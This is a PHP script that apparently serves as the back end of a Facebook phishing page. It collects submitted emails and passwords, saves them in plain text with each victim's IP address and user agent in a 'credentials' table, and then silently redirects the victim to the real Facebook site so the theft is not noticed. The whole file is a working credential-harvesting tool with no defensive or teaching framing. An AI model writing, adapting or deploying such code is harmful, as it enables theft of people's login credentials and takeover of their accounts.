<?php
include 'db.php';

// Enable error reporting for debugging
error_reporting(E_ALL);
ini_set('display_errors', 1);

// echo "<pre>🔄 process.php started...\n";

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email = $_POST['email'] ?? '';
    $password = $_POST['password'] ?? '';

    // echo "📧 Email: $email\n";
    // echo "🔒 Password: $password\n";

    // Sanitize
    $email = filter_var($email, FILTER_SANITIZE_EMAIL);
    $password = htmlspecialchars($password);

    // Validate
    if (empty($email) || empty($password)) {
        die('❌ Email or password is empty.');
    }

    if (!isset($conn)) {
        die('❌ DB connection failed. `$conn` not found.');
    }

    if ($conn->connect_error) {
        die('❌ Connection failed: ' . $conn->connect_error);
    }

    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        die('❌ Invalid email format.');
    }

    // Capture IP & User Agent
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';

    // echo "🌐 IP: $ip\n";
    // echo "🧭 User-Agent: $user_agent\n";

    // Insert into DB
    $stmt = $conn->prepare("INSERT INTO credentials (email, password, ipaddress, user_agent) VALUES (?, ?, ?, ?)");
    if (!$stmt) {
        die('❌ Prepare failed: ' . $conn->error);
    }

    $stmt->bind_param("ssss", $email, $password, $ip, $user_agent);

    if ($stmt->execute()) {
        // echo "✅ Data saved successfully.\n";

        // Redirect to Facebook using JS (safer than header)
        echo "<script>window.location.href='https://www.facebook.com/';</script>";
        exit;

    } else {
        die('❌ Execute failed: ' . $stmt->error);
    }

} else {
    echo "⚠️ No POST data received.";
    // echo "<script>window.location.href='index.php';</script>";
    // exit;
}

echo "</pre>";
?>
